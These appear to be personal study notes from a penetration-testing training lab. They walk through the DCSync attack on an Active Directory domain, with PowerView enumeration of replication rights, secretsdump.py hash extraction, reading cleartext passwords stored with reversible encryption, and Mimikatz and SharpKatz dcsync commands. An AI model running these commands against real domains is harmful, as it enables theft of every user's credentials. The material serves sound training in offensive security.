inHTBTHM
Edit

DCSync

technique for stealing the Active Directory password database by using the built-in **Directory Replication Service Remote Protocol (DRS**), which is used by Domain Controllers to replicate domain data. use to read NTDS file (read all hashes of users)

need privilege DS-Replication-Get-Changes-All

image.png

  • Using Get-DomainUser to View adunn's Group Membership - SID

    Get-DomainUser -Identity adunn  |select samaccountname,objectsid,memberof,useraccountcontrol |fl

  • show privilege using sid

    $sid= "S-1-5-21-3842939050-3880317879-2865463114-1164"
Get-ObjectAcl "DC=inlanefreight,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'Replication-Get')} | ?{$_.SecurityIdentifier -match $sid} |select AceQualifier, ObjectDN, ActiveDirectoryRights,SecurityIdentifier,ObjectAceType | fl
    AceQualifier          : AccessAllowed
ObjectDN              : DC=INLANEFREIGHT,DC=LOCAL
ActiveDirectoryRights : ExtendedRight
SecurityIdentifier    : S-1-5-21-3842939050-3880317879-2865463114-1164
ObjectAceType         : DS-Replication-Get-Changes-In-Filtered-Set

AceQualifier          : AccessAllowed
ObjectDN              : DC=INLANEFREIGHT,DC=LOCAL
ActiveDirectoryRights : ExtendedRight
SecurityIdentifier    : S-1-5-21-3842939050-3880317879-2865463114-1164
ObjectAceType         : DS-Replication-Get-Changes

  • Extracting NTLM Hashes and Kerberos Keys Using secretsdump.py

    secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/adunn@172.16.5.5

    now we have 3 files with different type

  • Reversible Encryption

    feature which using when service demand password as a clear text

    2025-06-27 15_19_25-reverse_encrypt.png (1206×605) - Brave.png

  • Enumerating Further using Get-ADUser

    Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl

  • Checking for Reversible Encryption Option using Get-DomainUser

    Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol

  • Displaying the Decrypted Password

    cat inlanefreight_hashes.ntds.cleartext

    We will notice the tool decrypted the password and provided us with the cleartext value.

Performing the DSync Attack with Mimikatz

we use runas.exe to perform Mimikatz work with the privilege of target user

Using runas.exe

to use Mimikatz u must to target one user not all domain user like secretsdump.py

runas /netonly /user:INLANEFREIGHT\adunn powershell
.\mimikatz.exe SyncMaster757
privilege::debug
lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator

using sharpKatz

.\sharpKatz.exe --Command dcsync
PreviousACL Abuse TacticsNextWindows PrivEsc

Last updated